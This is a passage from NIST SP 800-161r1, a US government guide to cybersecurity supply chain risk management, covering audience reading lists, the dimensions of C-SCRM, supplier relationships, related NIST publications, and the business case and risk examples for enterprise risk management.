• Section 1: Introduction
• Section 2: Integration of C-SCRM into Enterprise-wide Risk Management
• Section 3.3: C-SCRM Awareness and Training
• Section 3.4: C-SCRM Key Practices
• Section 3.6: Dedicated Resources
• Appendix A: C-SCRM Security Controls
• Appendix B: C-SCRM Control Summary
• Appendix E: FASCSA
1.4.3. Acquisition and Procurement Owners and Operators
These readers are those with C-SCRM responsibilities as part of their role in the procurement or
acquisition function of an enterprise. Acquisition personnel may execute C-SCRM activities as a
part of their general responsibilities in the acquisition and procurement life cycle. These
personnel will collaborate closely with the enterprise’s C-SCRM personnel to execute C-SCRM
activities with acquisition and procurement. Recommended reading includes:
• Section 1: Introduction
• Section 2.1: The Business Case for C-SCRM
• Section 2.2: Cybersecurity Risks Throughout the Supply Chain
• Section 3.1: C-SCRM in Acquisition
• Section 3.3: C-SCRM Awareness and Training
• Appendix A: C-SCRM Security Controls
o These readers should pay special attention to requisite controls for supplier
contracts and include them in agreements with both primary and sub-tier
contractor parties.
• Appendix F: Software Supply Chain Security Guidelines
1.4.4. Information Security, Privacy, or Cybersecurity Operators
These readers are those with operational responsibility for protecting the confidentiality,
integrity, and availability of the enterprise’s critical processes and information systems. As part
of those responsibilities, these readers may find themselves directly or indirectly involved with
conducting Cybersecurity Supply Chain Risk Assessments and/or the selection and
implementation of C-SCRM controls. In smaller enterprises, these personnel may bear the
responsibility for implementing C-SCRM and should refer to Section 1.3.1 for guidance.
Recommended reading includes:
• Section 1: Introduction
• Section 2.1: The Business Case for C-SCRM
• Section 2.2: Cybersecurity Risks Throughout the Supply Chain
• Section 3.2: Supply Chain Information Sharing
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
7
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• Section 3.4: C-SCRM Key Practices
• Appendix A: C-SCRM Security Controls
• Appendix B: C-SCRM Control Summary
• Appendix C: Risk Exposure Framework
• Appendix G: C-SCRM Activities in the Risk Management Process
• Appendix E: FASCSA
• Appendix F: Software Supply Chain Security Guidelines
1.4.5. System Development, System Engineering, and System Implementation Personnel
These readers are those with responsibilities for executing activities within an information
system’s system development life cycle (SDLC). As part of their SDLC responsibilities, these
readers will be responsible for the execution of operational-level C-SCRM activities.
Specifically, these personnel may be concerned with implementing C-SCRM controls to manage
cybersecurity risks that arise from products and services provided through the supply chain
within the scope of their information system(s). Recommended reading includes:
• Section 1: Introduction
• Section 2.1: The Business Case for C-SCRM
• Section 2.2: Cybersecurity Risks Throughout the Supply Chain
• Section 2.3.4: Level 3 - Operational
• Appendix A: C-SCRM Security Controls
• Appendix B: C-SCRM Control Summary
• Appendix C: Risk Exposure Framework
• Appendix F: Software Supply Chain Security Guidelines
• Appendix G: C-SCRM Activities in the Risk Management Process
1.5.
Background
C-SCRM encompasses activities that span the entire SDLC, including research and development,
design, manufacturing, acquisition, delivery, integration, operations and maintenance, disposal,
and the overall management of an enterprise’s products and services. Enterprises should
integrate C-SCRM within the SDLC as this is a critical area for addressing cybersecurity risks
throughout the supply chain. C-SCRM is the organized and purposeful management of
cybersecurity risks throughout the supply chain. C-SCRM requires enterprise recognition and
awareness, and it lies at the intersections of security, suitability, safety, reliability, usability,
quality, integrity, efficiency, maintainability, scalability, and resilience, as depicted in Figure 1-
1. These dimensions are layers of consideration for enterprises as they approach C-SCRM and
should be positively impacted by C-SCRM.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
8
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Fig. 1-1: Dimensions of C-SCRM
• Culture and Awareness is the set of shared values, practices, goals, and attitudes of the
organization that set the stage for successful C-SCRM. It includes a learning process that
influences individual and enterprise attitudes and understanding to realize the importance
of C-SCRM and the adverse consequences of its failure.6
• Security provides the confidentiality, integrity, and availability of (a) information that
describes the supply chain (e.g., information about the paths of products and services,
both logical and physical); (b) information, products, and services that traverse the supply
chain (e.g., intellectual property contained in products and services); and/or (c)
information about the parties participating in the supply chain (anyone who touches a
product or service throughout its life cycle).
• Suitability is focused on the supply chain and the provided products and services being
right and appropriate for the enterprise and its purpose.
• Safety is focused on ensuring that the product or service is free from conditions that can
cause death, injury, occupational illness, damage to or loss of equipment or property, or
damage to the environment. 7
• Reliability is focused on the ability of a product or service to function as defined for a
specified period of time in a predictable manner.8
6 NIST SP 800-16
7 NIST SP 800-160 Vol.2
8 NIST SP 800-160 Vol.2
Culture & Awareness
C-SCRM
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
9
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• Usability is focused on the extent to which a product or service can be used by specified
users to achieve specified goals with effectiveness, efficiency, and satisfaction in a
specified context of use.9
• Quality is focused on meeting or exceeding performance, technical, and functional
specifications while mitigating vulnerabilities and weaknesses that may limit the intended
function of a component or delivery of a service, lead to component or service failure, or
provide opportunities for exploitation.
• Efficiency is focused on the timeliness of the intended result delivered by a product or
service.
• Maintainability is focused on the ease of a product or service to accommodate change
and improvements based on past experience in support of expanding future derived
benefits.
• Integrity is focused on guarding products and the components of products against
improper modification or tampering and ensuring authenticity and pedigree.
• Scalability is the capacity of a product or service to handle increased growth and
demand.
• Resilience is focused on ensuring that a product, service, or the supply chain supports the
enterprise’s ability to prepare for and adapt to changing conditions and withstand and
recover rapidly from disruptions. Resilience includes the ability to withstand and recover
from deliberate attacks, accidents, or naturally occurring threats or incidents.
1.5.1. Enterprise’s Supply Chain
Contemporary enterprises run complex information systems and networks to support their
missions. These information systems and networks are composed of ICT/OT10 products and
components made available by suppliers, developers, and system integrators. Enterprises also
acquire and deploy an array of products and services, including:
• Custom software for information systems built to be deployed within the enterprise, made
available by developers;
• Operations, maintenance, and disposal support for information systems and networks
within and outside of the enterprise’s boundaries,11 made available by system integrators
or other ICT/OT-related service providers; and
• External services to support the enterprise’s operations that are positioned both inside and
outside of the authorization boundaries, made available by external system service
providers.
9 NIST SP 800-63-3
10 NIST SP 800-37, Rev. 2 defines Operational Technology as:
Programmable systems or devices that interact with the physical environment (or manage devices that interact with the physical
environment). These systems/devices detect or cause a direct change through the monitoring and/or control of devices, processes, and
events. Examples include industrial control systems, building management systems, fire control systems, and physical access control
mechanisms.
11 For federal information systems, this is the Authorization Boundary, defined in NIST SP 800-53, Rev. 5 as:
All components of an information system to be authorized for operation by an authorizing official. This excludes separately authorized
systems to which the information system is connected.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
10
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
These services may span the entire SDLC for an information system or service and may be:
• Performed by the staff employed by the enterprise, developer, system integrator, or
external system service provider;
• Physically hosted by the enterprise, developer, system integrator, or external system
service provider;
• Supported or comprised of development environments, logistics/delivery environments
that transport information systems and components, or applicable system and
communications interfaces;
• Proprietary, open source, or commercial off-the-shelf (COTS) hardware and software.
The responsibility and accountability for the services and associated activities performed by
different parties within this ecosystem are usually defined by agreement documents between the
enterprise and suppliers, developers, system integrators, external system service providers, and
other ICT/OT-related service providers.
1.5.2. Supplier Relationships Within Enterprises
Enterprises depend on the supply chain to provide a variety of products and services to enable
the enterprise to achieve its strategic and operational objectives. Identifying cybersecurity risks
throughout the supply chain is complicated by the information asymmetry that exists between
acquiring enterprises and their suppliers and service providers. Acquirers often lack visibility and
understanding of how acquired technology is developed, integrated, and deployed and how the
services that they acquire are delivered. Additionally, acquirers with inadequate or absent C-
SCRM processes, procedures, and practices may experience increased exposure cybersecurity
risks throughout the supply chain. The level of exposure to cybersecurity risks throughout the
supply chain depends largely on the relationship between the products and services provided and
the criticality of the missions, business processes, and systems that they support. Enterprises
have a variety of relationships with their suppliers, developers, system integrators, external
system service providers, and other ICT/OT-related service providers. Figure 1-2 depicts how
these diverse relationships affect an enterprise’s visibility and control of the supply chain.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
11
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Fig. 1-2: An Enterprise’s Visibility, Understanding, and Control of its Supply Chain
Some supply chain relationships are tightly intermingled, such as a system integrator’s
development of a complex information system operating within the federal agency’s
authorization boundary or the management of federal agency information systems and resources
by an external service provider. These relationships are usually guided by an agreement (e.g.,
contract) that establishes detailed functional, technical, and security requirements and may
provide for the custom development or significant customization of products and services. For
these relationships, system integrators and external service providers are likely able to work with
the enterprise to implement such processes and controls (listed within this document) that are
deemed appropriate based on the results of a criticality and risk assessment and cost/benefit
analysis. This may include floating requirements upstream in the supply chain to ensure higher
confidence in the satisfaction of necessary assurance objectives. The decision to extend such
requirements must be balanced with an appreciation of what is feasible and cost-effective. The
degree to which system integrators and external service providers are expected to implement C-
SCRM processes and controls should be weighed against the risks to the enterprise posed by not
adhering to those additional requirements. Often, working directly with the system integrators
and external service providers to proactively identify appropriate mitigation processes and
controls will help create a more cost-effective strategy.
Procuring ICT/OT products from suppliers establishes a direct relationship between those
suppliers and the acquirers. This relationship is also usually guided by an agreement between the
acquirer and the supplier. However, commercial ICT/OT developed by suppliers are typically
designed for general purposes for a global market and are not tailored to an individual
customer’s specific operational or threat environments. Enterprises should perform due diligence
and research regarding their specific C-SCRM requirements to determine if an IT solution is fit
Developer
Supplier
External Service
Provider
Supplier
Developers
Supplier
External
Service Provider
ICT/IOT
Supplier
Supplier
ICT/OT
Supplier
External System
Service Provider
Supplier
External System
Service Provider
Supplier
External System
Service Provider
Acquiring
Enterprise
System
Integrator
ICT/OT
Supplier
Reduced Visibility, Understanding and Control
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
12
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
for purpose,12 includes requisite security features and capabilities, will meet quality and
resiliency expectations, and requires support by the supplier for the product or product
components over its life cycle.
An assessment of the findings of an acquirer’s research about a product, which may include
engaging in direct dialogue with suppliers whenever possible, will help acquirers understand the
characteristics and capabilities of existing ICT/OT products and services, set expectations and
requirements for suppliers, and identify C-SCRM needs not yet satisfied by the market. It can
also help identify emerging solutions that may at least partially support the acquirer’s needs.
Overall, such research and engagement with a supplier will allow the acquirer to better articulate
their requirements to align with and drive market offerings and to make risk-based decisions
about product purchases, configurations, and usages within their environment.
Managing Cost and Resources
Balancing exposure to cybersecurity risks throughout the supply chain with the costs and
benefits of implementing C-SCRM practices and controls should be a key component of the
acquirer’s overall approach to C-SCRM.
Enterprises should be aware that implementing C-SCRM practices and controls necessitates
additional financial and human resources. Requiring a greater level of testing, documentation, or
security features from suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers may increase the price of a product or
service, which may result in increased cost to the acquirer. This is especially true for those
products and services developed for general-purpose applications and not tailored to the specific
enterprise security or C-SCRM requirements. When deciding whether to require and implement
C-SCRM practices and controls, acquirers should consider both the costs of implementing these
controls and the risks of not implementing them.
When possible and appropriate, acquirers should allow suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers the opportunity to
reuse applicable existing data and documentation that may provide evidence to support C-SCRM
(e.g., certification of a vendor to a relevant standard, such as ISO 27001). Doing this results in
cost savings to the acquirer and supplier. However, in some cases, documentation reuse may not
be appropriate as additional or different information may be needed, and a reassessment may be
required (e.g., previously audited supplier developing a new, not yet produced product).
Regardless, acquirers should identify and include security considerations early in the acquisition
process.
12 “Fit for purpose” is a term used to informally describe a process, configuration item, IT service, etc. that is capable of meeting its objectives or
service levels. Being fit for purpose requires suitable design, implementation, control, and maintenance. (Adapted from Information Technology
Infrastructure Library (ITIL) Service Strategy [ITIL Service Strategy].)
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
13
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
1.6.
Methodology for Building C-SCRM Guidance Using NIST SP 800-39; NIST SP 800-
37, Rev 2; and NIST SP 800-53, Rev 5
This publication applies the multilevel risk management approach of [NIST SP 800-39] by
providing C-SCRM guidance at the enterprise, mission, and operational levels. It also introduces
a navigational system for [SP 800-37, Rev. 2] allowing users to focus on relevant sections of this
publication more easily. Finally, it contains an enhanced overlay of specific C-SCRM controls,
building on [NIST SP 800-53, Rev. 5].
The guidance/controls contained in this publication are built on existing multidisciplinary
practices and are intended to increase the ability of enterprises to manage the associated
cybersecurity risks throughout the supply chain over the entire life cycle of systems, products,
and services. It should be noted that this publication gives enterprises the flexibility to either
develop stand-alone documentation (e.g., policies, assessment and authorization [A&A] plan,
and C-SCRM plan) for C-SCRM or to integrate it into existing agency documentation.
For individual systems, this guidance is recommended for use with information systems at all
impact categories, according to [FIPS 199]. The agencies may choose to prioritize applying this
guidance to systems at a higher impact level or to specific system components. Finally, this
document describes the development and implementation of C-SCRM Strategies and
Implementation Plans for development at the enterprise and mission and business level of an
enterprise and a C-SCRM system plan at the operational level of an enterprise. A C-SCRM plan
at the operational level is informed by the cybersecurity supply chain risk assessments and
should contain C-SCRM controls tailored to specific agency mission and business needs,
operational environments, and/or implementing technologies.
Integration into the Risk Management Process
The processes in this publication should be integrated into the enterprise’s existing SDLCs and
enterprise environments at all levels of risk management processes and hierarchy (e.g.,
enterprise, mission, system), as described in [NIST SP 800-39]. Section 2 provides an overview
of the [NIST SP 800-39] risk management hierarchy and approach and identifies C-SCRM
activities in the risk management process. Appendix C builds on Section 2 of [NIST SP 800-39],
providing descriptions and explanations of ICT/OT SCRM activities. The structure of Appendix
C mirrors [NIST SP 800-39].
Implementing C-SCRM in the Context of SP 800-37, Revision 2
C-SCRM activities described in this publication are closely related to the Risk Management
Framework described in [NIST SP 800-37, Rev. 2]. Specifically, C-SCRM processes conducted
at the operational level should closely mirror and/or serve as inputs to those steps completed as
part of [NIST SP 800-37, Rev 2]. C-SCRM activities completed at Levels 1 and 2 should provide
inputs (e.g., risk assessment results) to the operational level and RMF-type processes, where
possible and applicable. Section 2 and Appendix C describe the linkages between C-SCRM and
[NIST SP 800-37, Rev. 2] in further detail.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
14
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
1.7.
Relationship to Other Publications and Publication Summary
This publication builds on the concepts promoted within other NIST publications and tailors
those concepts for use within Cybersecurity Supply Chain Risk Management. As a result of this
relationship, this publication inherits many of its concepts and looks to other NIST publications
to continue advancing base frameworks, concepts, and methodologies. Those NIST publications
include:
• NIST Cybersecurity Framework (CSF) Version 1.1: Voluntary guidance based on
existing standards, guidelines, and practices for organizations to better manage and
reduce cybersecurity risk. It was also designed to foster risk and cybersecurity
management communications among both internal and external organizational
stakeholders.
• FIPS 199, Standards for Security Categorization of Federal Information and
Information Systems: A standard for categorizing federal information and information
systems according to an agency’s level of concern for confidentiality, integrity, and
availability and the potential impact on agency assets and operations should their
information and information systems be compromised through unauthorized access, use,
disclosure, disruption, modification, or destruction.
• SP 800-30, Revision 1, Guide for Conducting Risk Assessments: Guidance for
conducting risk assessments of federal information systems and organizations, amplifying
the guidance in SP 800-39. Risk assessments carried out at all three tiers in the risk
management hierarchy are part of an overall risk management process that provides
senior leaders/executives with the information needed to determine appropriate courses of
action in response to identified risks.
• SP 800-37, Revision 2, Risk Management Framework for Information Systems and
Organizations: A System Life Cycle Approach for Security and Privacy: Describes the
Risk Management Framework (RMF) and provides guidelines for applying the RMF to
information systems and organizations. The RMF provides a disciplined, structured, and
flexible process for managing security and privacy risk that includes information security
categorization; control selection, implementation, and assessment; system and common
control authorizations; and continuous monitoring.
• SP 800-39, Managing Information Security Risk: Organization, Mission, and
Information System View: Provides guidance for an integrated, organization-wide
program for managing information security risk to organizational operations (i.e.,
mission, functions, image, and reputation), organizational assets, individuals, other
organizations, and the Nation resulting from the operation and use of federal information
systems.
• SP 800-53, Revision 5, Security and Privacy Controls for Information Systems and
Organizations: Provides a catalog of security and privacy controls for information
systems and organizations to protect organizational operations and assets, individuals,
other organizations, and the Nation from a diverse set of threats and risks, including
hostile attacks, human errors, natural disasters, structural failures, foreign intelligence
entities, and privacy risks.
• SP 800-53B, Control Baselines for Information Systems and Organizations: Provides
security and privacy control baselines for the Federal Government. There are three
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
15
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
security control baselines – one for each system impact level (i.e., low-impact, moderate-
impact, and high-impact) – and a privacy baseline that is applied to systems irrespective
of impact level;
• SP 800-160 Vol. 1, Systems Security Engineering: Addresses the engineering-driven
perspective and actions necessary to develop more defensible and survivable systems,
inclusive of the machine, physical, and human components comprising the systems,
capabilities, and services delivered by those systems.
• SP 800-160 Vol. 2, Revision 1, Developing Cyber Resilient Systems: A Systems
Security Engineering Approach: A handbook for achieving identified cyber resiliency
outcomes based on a systems engineering perspective on system life cycle processes in
conjunction with risk management processes, allowing the experience and expertise of
the organization to help determine what is correct for its purpose.
• SP 800-181, Revision 1, National Initiative for Cybersecurity Education (NICE)
Cybersecurity Workforce Framework: A fundamental reference for describing and
sharing information about cybersecurity work. It expresses that work as Task statements
and describes Knowledge and Skill statements that provide a foundation for learners,
including students, job seekers, and employees.
•
NISTIR 7622, Notional Supply Chain Risk Management Practices for Federal Information
Systems: Provides a wide array of practices that help mitigate supply chain risk to federal
information systems. It seeks to equip federal departments and agencies with a notional set of
repeatable and commercially reasonable supply chain assurance methods and practices that offer
a means to obtain an understanding of and visibility throughout the supply chain.
• NISTIR 8179, Criticality Analysis Process Model: Prioritizing Systems and
Components: Helps organizations identify those systems and components that are most
vital and which may need additional security or other protections.
• NISTIR 8276, Key Practices in Cyber Supply Chain Risk Management: Observations
from Industry: Provides a set of Key Practices that any organization can use to manage
the cybersecurity risks associated with their supply chains. The Key Practices presented
in this document can be used to implement a robust C-SCRM function at an organization
of any size, scope, and complexity. These practices combine the information contained in
existing C-SCRM government and industry resources with the information gathered
during the 2015 and 2019 NIST research initiatives.
•
NISTIR 8286, Identifying and Estimating Cybersecurity Risk for Enterprise Risk Management
(ERM): Helps individual organizations within an enterprise improve their cybersecurity risk
information, which they provide as inputs to their enterprise’s ERM processes through
communication and risk information sharing.
• NISTIR 8286A, Identifying and Estimating Cybersecurity Risk for Enterprise Risk
Management: Offers examples and information to illustrate risk tolerance, risk appetite,
and methods for determining risks in that context. To support the development of an
Enterprise Risk Register, this report describes the documentation of various scenarios
based on the potential impact of threats and vulnerabilities on enterprise assets.
Documenting the likelihood and impact of various threat events through cybersecurity
risk registers integrated into an enterprise risk profile helps to later prioritize and
communicate enterprise cybersecurity risk response and monitoring.
• NISTIR 8286B, Prioritizing Cybersecurity Risk for Enterprise Risk Management:
Provides detail regarding stakeholder risk guidance and risk identification and analysis.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
16
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
This second publication describes the need for determining the priorities of each of those
risks in light of their potential impact on enterprise objectives, as well as options for
properly treating that risk. This report describes how risk priorities and risk response
information are added to the cybersecurity risk register (CSRR) in support of an overall
enterprise risk register. Information about the selection of and projected cost of risk
response will be used to maintain a composite view of cybersecurity risks throughout the
enterprise, which may be used to confirm and adjust risk strategy to ensure mission
success.
This publication also draws upon concepts and work from other regulations, government reports,
standards, guidelines, and best practices. A full list of those resources can be found in Appendix
H.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
17
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Key Takeaways13
The Supply Chain. ICT/OT relies on a globally distributed, interconnected supply chain
ecosystem that consists of public and private sector entities (e.g., acquirers, suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related
service providers).
Supply Chain Products and Services. Products and services that enterprises rely on the supply
chain for include the provision of systems and system components, open source and custom
software, operational support services, hosting systems and services, and performing system
support roles.
Supply Chain Benefits and Risk. This ecosystem offers benefits such as cost savings,
interoperability, rapid innovation, product feature variety, and the ability to choose between
competing vendors. However, the same mechanisms that provide those benefits might also
introduce a variety of cybersecurity risks throughout the supply chain (e.g., a supplier disruption
that causes a reduction in service levels and leads to dissatisfaction from the enterprise’s
customer base).
Cybersecurity Supply Chain Risk Management (C-SCRM). C-SCRM, as described in this
document, is a systematic process that aims to help enterprises manage cybersecurity risks
throughout the supply chain. Enterprises should identify, adopt, and tailor the practices described
in this document to best suit their unique strategic, operational, and risk context.
Scope of C-SCRM. C-SCRM encompasses a wide array of stakeholder groups that include
information security and privacy, system developers and implementers, acquisition,
procurement, legal, and HR. C-SCRM covers activities that span the entire system development
life cycle (SDLC), from initiation to disposal. In addition, identified cybersecurity risks
throughout the supply chain should be aggregated and contextualized as part of enterprise risk
management processes to ensure that the enterprise understands the total risk exposure of its
critical operations to different risk types (e.g., financial risk, strategic risk).
13 Key takeaways describe key points from the section text. Refer to the Glossary in Appendix H for definitions.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
18
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
INTEGRATION OF C-SCRM INTO ENTERPRISE-WIDE RISK MANAGEMENT14
C-SCRM should be integrated into the enterprise-wide risk management process described in
[NIST SP 800-39] and depicted in Figure 2-1. This process includes the following continuous
and iterative steps:
• Frame risk. Establish the context for risk-based decisions and the current state of the
enterprise’s information and communications technology and services and the associated
supply chain.
• Assess risk. Review and interpret criticality, threat, vulnerability, likelihood,15 impact,
and related information.
• Respond to risk. Select, tailor, and implement mitigation controls based on risk
assessment findings.
• Monitor risk. Monitor risk exposure and the effectiveness of mitigating risk on an
ongoing basis, including tracking changes to an information system or supply chain using
effective enterprise communications and a feedback loop for continuous improvement.
Fig. 2-1: Risk Management Process
Managing cybersecurity risks throughout the supply chain is a complex undertaking that requires
cultural transformation and a coordinated, multidisciplinary approach across an enterprise.
Effective cybersecurity supply chain risk management (C-SCRM) requires engagement from
stakeholders inside the enterprise (e.g., departments, processes) and outside of the enterprise
(e.g., suppliers, developers, system integrators, external system service providers, and other
ICT/OT-related service providers) to actively collaborate, communicate, and take actions to
secure favorable C-SCRM outcomes. Successful C-SCRM requires an enterprise-wide cultural
14 Departments and agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
15 For C-SCRM purposes, likelihood is defined as the probability of a threat exploiting a vulnerability within a given timeframe. It should be
noted that in mathematics, likelihood and probability are fundamentally different concepts, but the difference between the two is outside of the
scope of this publication.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
19
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
shift to a state of heightened awareness and preparedness as to the potential ramifications of
cybersecurity risks throughout the supply chain.
Enterprises should aim to infuse perspectives from multiple disciplines and processes (e.g.,
information security, procurement, enterprise risk management, engineering, software
development, IT, legal, HR, etc.) into their approaches to managing cybersecurity risks
throughout the supply chain. Enterprises may define explicit roles to bridge and integrate these
processes as a part of an enterprise’s broader risk management activities. This orchestrated
approach is an integral part of an enterprise’s effort to identify C-SCRM priorities, develop
solutions, and incorporate C-SCRM into overall risk management decisions. Enterprises should
perform C-SCRM activities as a part of the acquisition, SDLC, and broader enterprise risk
management processes. Embedded C-SCRM activities involve determining the criticality of
functions and their dependency on the supplied products and services, identifying and assessing
applicable risks, determining appropriate mitigating actions, documenting selected risk response
actions, and monitoring performance of C-SCRM activities. As exposure to supply chain risk
differs across (and sometimes within) enterprises, business and mission-specific strategies, and
policies should set the tone and direction for C-SCRM across the enterprise.
2.1.
The Business Case for C-SCRM
Today, every enterprise heavily relies on digital technology to fulfill its business and mission.
Digital technology is comprised of ICT/OT products and is delivered through and supported by
services. C-SCRM is a critical capability that every enterprise needs to have to address
cybersecurity risks throughout the supply chain that arise from the use of digital technology. The
depth, extent, and maturity of a C-SCRM capability for each enterprise should be based on the
uniqueness of its business or mission, enterprise-specific compliance requirements, operational
environment, risk appetite, and risk tolerance.
Establishing and sustaining a C-SCRM capability creates a number of significant benefits:
• An established C-SCRM program will enable enterprises to understand which critical
assets are most susceptible to supply chain weaknesses and vulnerabilities.
• C-SCRM reduces the likelihood of supply chain compromise by a cybersecurity threat
by enhancing an enterprise’s ability to effectively detect, respond, and recover from
events that result in significant business disruptions should a C-SCRM compromise
occur.
Organizations should ensure that tailored C-SCRM plans are designed to:
• Manage rather than eliminate risk as risk is integral to the pursuit of value;
• Ensure that operations are able to adapt to constantly emerging or evolving threats;
• Be responsive to changes within their own organization, programs, and the supporting
information systems; and
• Adjust to the rapidly evolving practices of the private sector’s global ICT supply
chain.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
20
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• Operational and enterprise efficiencies are achieved through clear structure, purpose, and
alignment with C-SCRM capabilities and the prioritization, consolidation, and
streamlining of existing C-SCRM processes.
• There is greater assurance that acquired products are of high quality, authentic, reliable,
resilient, maintainable, secure, and safe.
• There is greater assurance that suppliers, service providers, and the technology products
and services that they provide are trustworthy and can be relied upon to meet performance
requirements.
C-SCRM is fundamental to any effort to manage risk exposure arising from enterprise
operations. Implementing C-SCRM processes and controls requires human, tooling, and
infrastructure investments by acquirers and their developers, system integrators, external system
service providers, and other ICT/OT-related service providers. However, enterprises have finite
resources to commit to establishing and deploying C-SCRM processes and controls. As such,
enterprises should carefully weigh the potential costs and benefits when making C-SCRM
resource commitment decisions and make decisions based on a clear understanding of any risk
exposure implications that could arise from a failure to commit the necessary resources to C-
SCRM.
While there are cost-benefit trade-offs that must be acknowledged, the need to better secure
supply chains is an imperative for both government and the private sector. The passage of the
2018 SECURE Technology Act,16 the formation of the FASC, and the observations from the
2015 and 2019 Case Studies in Cyber Supply Chain Risk Management captured in NIST
Interagency or Internal Report (NISTIR) 8276, Key Practices in Cyber Supply Chain Risk
Management, point to a broad public and private sector consensus: C-SCRM capabilities are a
critical and foundational component of any enterprise’s risk posture.
2.2.
Cybersecurity Risks Throughout Supply Chains
Cybersecurity risks throughout the supply chain refers to the potential for harm or compromise
that arises from the cybersecurity risks posed by suppliers, their supply chains, and their products
or services. Examples of these risks include:
• Insiders working on behalf of a system integrator steal sensitive intellectual property,
resulting in the loss of a major competitive advantage.17
• A proxy working on behalf of a nation-state inserts malicious software into supplier-
provided product components used in systems sold to government agencies. A breach
occurs and results in the loss of several government contracts.
• A system integrator working on behalf of an agency reuses vulnerable code, leading to a
breach of mission-critical data with national security implications.
• An organized criminal enterprise introduces counterfeit products onto the market,
resulting in a loss of customer trust and confidence.
• A company is on contract to produce a critical component of a larger acquisition, but the
company relabels products from an unvetted supplier. A critical component that cannot
16 SECURE Technology Act - Public Law 115-390: https://www.govinfo.gov/app/details/COMPS-15413
17 To qualify as a cybersecurity risk throughout the supply chain, insider threats specifically deal with instances of third-party insider threats.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
21
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
be trusted is deployed into operational systems, and there no trusted supplier of
replacement parts.
Risks such as these are realized when threats in the cybersecurity supply chain exploit existing
vulnerabilities. Figure 2-2 depicts supply chain cybersecurity risks resulting from the likelihood
that relevant threats may exploit applicable vulnerabilities and the consequential potential
impacts.
Fig. 2-2: Cybersecurity Risks Throughout the Supply Chain
Supply chain cybersecurity vulnerabilities may lead to persistent negative impacts on an
enterprise’s missions, ranging from a reduction in service levels leading to customer
dissatisfaction to the theft of intellectual property or the degradation of critical mission and
business processes. It may, however, take years for such vulnerabilities to be exploited or
discovered. It may also be difficult to determine whether an event was the direct result of a
supply chain vulnerability. Vulnerabilities in the supply chain are often interconnected and may
expose enterprises to cascading cybersecurity risks. For example, a large-scale service outage at
a major cloud services provider may cause service or production disruptions for multiple entities
within an enterprise’s supply chain and lead to negative effects within multiple mission and
business processes.
Cybersecurity Risks Throughout the Supply Chain
Adversarial: E.g., insertion of malware,
counterfeits, industrial espionage, supply
disruption, service outage, foreign intelligence
entity
Non-adversarial: E.g., natural disaster,
poor quality products/services, geopolitical (war),
legal/regulatory changes affecting
supply (sanctions)
External: E.g., interdependencies in the supply
chain (primary suppliers with common level-2
suppliers, supply chain entity weaknesses
(inadequate capacity), inadequate cyber hygiene
Internal: E.g., vulnerable information systems and
components, unpatched systems, ineffective
security controls, lack of cyber awareness
Threats
Vulnerabilities
Adversarial: Capability and intent
Non-adversarial: Historical rate of occurrence
Likelihood (probability of a threat exploiting a vulnerability[s])
To: mission/business function
Ex. Impact: Loss of customers and public trust due to data disclosure
Ex. Impact: Loss of classified information resulting in compromised national security
Ex. Impact: Production delays due to supply chain disruptions
Impact—degree of harm
Ex. Impact: Loss of intellectual property due to data exfiltration
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
